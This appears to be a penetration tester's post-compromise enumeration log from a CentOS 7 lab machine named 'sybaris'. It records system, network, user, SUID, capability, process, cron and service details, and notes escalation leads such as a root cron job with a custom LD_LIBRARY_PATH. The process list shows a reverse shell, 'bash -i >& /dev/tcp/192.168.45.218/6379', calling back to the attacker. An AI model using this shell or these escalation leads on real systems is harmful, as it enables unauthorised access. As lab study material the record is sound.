System/Kernel


[pablo@sybaris /]$ uname -a ; cat /etc/*release
Linux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
 
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
 
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)
  • 3.10.0-1127.19.1.el7.x86_64
  • x86_64
  • CentOS Linux release 7.8.2003 (Core)

Networks


[pablo@sybaris /]$ ip route ; arp -a
default via 192.168.185.254 dev ens192 
169.254.0.0/16 dev ens192 scope link metric 1003 
192.168.185.0/24 dev ens192 proto kernel scope link src 192.168.185.93 
gateway (192.168.185.254) at 00:50:56:9e:72:00 [ether] on ens192
[pablo@sybaris /]$ netstat -antup4
netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      909/redis-server 0. 
tcp        0      0 192.168.185.93:6379     192.168.45.218:57214    ESTABLISHED 909/redis-server 0. 
tcp        0    141 192.168.185.93:34240    192.168.45.218:6379     ESTABLISHED 1740/bash           
udp        0      0 192.168.185.93:57754    131.111.8.63:123        ESTABLISHED -                   
udp        0      0 192.168.185.93:39756    131.111.8.61:123        ESTABLISHED -                   
udp        0      0 192.168.185.93:54475    77.104.162.218:123      ESTABLISHED -                   
udp        0      0 192.168.185.93:46920    91.109.118.94:123       ESTABLISHED -                   
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -                   

tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -

Users & Groups


[pablo@sybaris /]$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
pablo:x:1000:1000::/home/pablo:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
total 0
0 dr-xr-xr-x. 17 root  root  244 Sep  4  2020 ..
0 drwxr-xr-x.  2 pablo pablo 100 Sep  4  2020 pablo
0 drwxr-xr-x.  3 root  root   19 Sep  4  2020 .

pablo

[pablo@sybaris /]$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
uid=48(apache) gid=48(apache) groups=48(apache)

uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)

SUIDs


[pablo@sybaris /]$ find / -perm -04000 -ls -type f 2>/dev/null
12996561   76 -rwsr-xr-x   1 root     root        73888 Aug  8  2019 /usr/bin/chage
12996562   80 -rwsr-xr-x   1 root     root        78408 Aug  8  2019 /usr/bin/gpasswd
12997277   24 -rws--x--x   1 root     root        23968 Apr  1  2020 /usr/bin/chfn
12997280   24 -rws--x--x   1 root     root        23880 Apr  1  2020 /usr/bin/chsh
12996565   44 -rwsr-xr-x   1 root     root        41936 Aug  8  2019 /usr/bin/newgrp
12997360   32 -rwsr-xr-x   1 root     root        32128 Apr  1  2020 /usr/bin/su
12997121  144 ---s--x--x   1 root     root       147336 Apr  1  2020 /usr/bin/sudo
12997345   44 -rwsr-xr-x   1 root     root        44264 Apr  1  2020 /usr/bin/mount
12997582   32 -rwsr-xr-x   1 root     root        31984 Apr  1  2020 /usr/bin/umount
13047813   60 -rwsr-xr-x   1 root     root        57656 Aug  8  2019 /usr/bin/crontab
13047571   24 -rwsr-xr-x   1 root     root        23576 Apr  1  2020 /usr/bin/pkexec
12584827   28 -rwsr-xr-x   1 root     root        27856 Mar 31  2020 /usr/bin/passwd
12875325   32 -rwsr-xr-x   1 root     root        32096 Oct 30  2018 /usr/bin/fusermount
  7006   36 -rwsr-xr-x   1 root     root        36272 Apr  1  2020 /usr/sbin/unix_chkpwd
  7004   12 -rwsr-xr-x   1 root     root        11232 Apr  1  2020 /usr/sbin/pam_timestamp_check
298708   12 -rwsr-xr-x   1 root     root        11296 Mar 31  2020 /usr/sbin/usernetctl
4375945   16 -rwsr-xr-x   1 root     root        15432 Apr  1  2020 /usr/lib/polkit-1/polkit-agent-helper-1
4375928   60 -rwsr-x---   1 root     dbus        57936 Jul 13  2020 /usr/libexec/dbus-1/dbus-daemon-launch-helper

SGIDs


[pablo@sybaris /]$ find / -type f -perm -02000 -ls 2>/dev/null
12588038   16 -r-xr-sr-x   1 root     tty         15344 Jun  9  2014 /usr/bin/wall
12997588   20 -rwxr-sr-x   1 root     tty         19544 Apr  1  2020 /usr/bin/write
13196585  376 ---x--s--x   1 root     nobody     382216 Aug  8  2019 /usr/bin/ssh-agent
298703   12 -rwxr-sr-x   1 root     root        11224 Mar 31  2020 /usr/sbin/netreport
434195  216 -rwxr-sr-x   1 root     postdrop   218560 Apr  1  2020 /usr/sbin/postdrop
434202  260 -rwxr-sr-x   1 root     postdrop   264128 Apr  1  2020 /usr/sbin/postqueue
8643993   12 -rwx--s--x   1 root     utmp        11192 Jun  9  2014 /usr/libexec/utempter/utempter
4380384  456 ---x--s--x   1 root     ssh_keys   465760 Aug  8  2019 /usr/libexec/openssh/ssh-keysign

Capabilities


[pablo@sybaris /]$ getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

/usr/sbin/suexec = cap_setgid,cap_setuid+ep

Processes


[pablo@sybaris /]$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0 125352  3872 ?        Ss   09:08   0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       483  0.0  0.0  39084  2336 ?        Ss   09:08   0:00 /usr/lib/systemd/systemd-journald
root       505  0.0  0.0 198572  1344 ?        Ss   09:08   0:00 /usr/sbin/lvmetad -f
root       511  0.0  0.0  45020  1940 ?        Ss   09:08   0:00 /usr/lib/systemd/systemd-udevd
root       612  0.0  0.0  55532   852 ?        S<sl 09:08   0:00 /sbin/auditd
root       635  0.0  0.1  99688  6200 ?        Ss   09:08   0:00 /usr/bin/VGAuthService -s
polkitd    637  0.0  0.3 612248 14168 ?        Ssl  09:08   0:00 /usr/lib/polkit-1/polkitd --no-debug
dbus       638  0.0  0.0  58240  2460 ?        Ss   09:08   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       653  0.0  0.1 314460  7288 ?        Ssl  09:08   0:00 /usr/bin/vmtoolsd
root       659  0.0  0.0  26384  1760 ?        Ss   09:08   0:00 /usr/lib/systemd/systemd-logind
root       661  0.0  0.0 126388  1580 ?        Ss   09:08   0:00 /usr/sbin/crond -n
root       671  0.0  0.0 110208   856 tty1     Ss+  09:08   0:00 /sbin/agetty --noclear tty1 linux
chrony     675  0.0  0.0 117808  1752 ?        S    09:08   0:00 /usr/sbin/chronyd
root       690  0.0  0.2 550264  8816 ?        Ssl  09:08   0:00 /usr/sbin/NetworkManager --no-daemon
root       905  0.0  0.6 651120 23352 ?        Ss   09:08   0:00 /usr/sbin/httpd -DFOREGROUND
root       907  0.0  0.5 574304 19448 ?        Ssl  09:08   0:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       908  0.0  0.1 112924  4320 ?        Ss   09:08   0:00 /usr/sbin/sshd -D
pablo      909  0.0  0.2 154032  8308 ?        Ssl  09:08   0:00 /usr/local/bin/redis-server 0.0.0.0:6379
root       910  0.0  0.0 226744  3544 ?        Ssl  09:08   0:00 /usr/sbin/rsyslogd -n
root       912  0.0  0.0  53288   700 ?        Ss   09:08   0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
apache    1080  0.0  0.2 651256 10368 ?        S    09:08   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1081  0.0  0.2 651256 10368 ?        S    09:08   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1082  0.0  0.2 651256 10368 ?        S    09:08   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1083  0.0  0.2 651256 10368 ?        S    09:08   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1084  0.0  0.2 651256 10368 ?        S    09:08   0:00 /usr/sbin/httpd -DFOREGROUND
root      1213  0.0  0.0  89704  2168 ?        Ss   09:08   0:00 /usr/libexec/postfix/master -w
postfix   1223  0.0  0.1  89876  4124 ?        S    09:08   0:00 qmgr -l -t unix -u
postfix   1674  0.0  0.1  89808  4096 ?        S    09:10   0:00 pickup -l -t unix -u
pablo     1739  0.0  0.0 113284  1200 ?        S    09:15   0:00 bash -c bash -i >& /dev/tcp/192.168.45.218/6379 0>&1
pablo     1740  0.0  0.0 115544  2044 ?        S    09:15   0:00 bash -i
pablo     1860  0.0  0.0 155476  1876 ?        R    09:18   0:00 ps -auxwww
  • polkitd 637 0.0 0.3 612248 14168 ? Ssl 09:08 0:00 /usr/lib/polkit-1/polkitd --no-debug
  • root 661 0.0 0.0 126388 1580 ? Ss 09:08 0:00 /usr/sbin/crond -n
  • chrony 675 0.0 0.0 117808 1752 ? S 09:08 0:00 /usr/sbin/chronyd
  • root 905 0.0 0.6 651120 23352 ? Ss 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
  • pablo 909 0.0 0.2 154032 8308 ? Ssl 09:08 0:00 /usr/local/bin/redis-server 0.0.0.0:6379
  • root 912 0.0 0.0 53288 700 ? Ss 09:08 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
  • root 1213 0.0 0.0 89704 2168 ? Ss 09:08 0:00 /usr/libexec/postfix/master -w
  • postfix 1223 0.0 0.1 89876 4124 ? S 09:08 0:00 qmgr -l -t unix -u
  • postfix 1674 0.0 0.1 89808 4096 ? S 09:10 0:00 pickup -l -t unix -u

Cron & Systemd


[pablo@sybaris /]$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for pablo
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
 
# For details see man 4 crontabs
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root       /usr/bin/log-sweeper
NEXT                         LEFT          LAST PASSED UNIT                         ACTIVATES
Sat 2025-03-29 09:23:25 EDT  3min 40s left n/a  n/a    systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
 
1 timers listed.
Pass --all to see loaded but inactive timers, too.

  • LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
  • * * * * * root /usr/bin/log-sweeper

Services


[pablo@sybaris /]$ systemctl list-units --state=running
UNIT                              LOAD   ACTIVE SUB     DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
auditd.service                    loaded active running Security Auditing Service
chronyd.service                   loaded active running NTP client/server
crond.service                     loaded active running Command Scheduler
dbus.service                      loaded active running D-Bus System Message Bus
getty@tty1.service                loaded active running Getty on tty1
httpd.service                     loaded active running The Apache HTTP Server
lvm2-lvmetad.service              loaded active running LVM2 metadata daemon
NetworkManager.service            loaded active running Network Manager
polkit.service                    loaded active running Authorization Manager
postfix.service                   loaded active running Postfix Mail Transport Agent
redis.service                     loaded active running Redis
rsyslog.service                   loaded active running System Logging Service
sshd.service                      loaded active running OpenSSH server daemon
systemd-journald.service          loaded active running Journal Service
systemd-logind.service            loaded active running Login Service
systemd-udevd.service             loaded active running udev Kernel Device Manager
tuned.service                     loaded active running Dynamic System Tuning Daemon
vgauthd.service                   loaded active running VGAuth Service for open-vm-tools
vmtoolsd.service                  loaded active running Service for virtual machines hosted on VMware
vsftpd.service                    loaded active running Vsftpd ftp daemon
dbus.socket                       loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket               loaded active running LVM2 metadata daemon socket
systemd-journald.socket           loaded active running Journal Socket
systemd-udevd-control.socket      loaded active running udev Control Socket
systemd-udevd-kernel.socket       loaded active running udev Kernel Socket
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
26 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
  • chronyd.service
  • httpd.service
  • postfix.service
  • redis.service

Sudo Version


[pablo@sybaris /]$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

Sudo version 1.8.23

Glibc Version


[pablo@sybaris /]$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (GNU libc) 2.17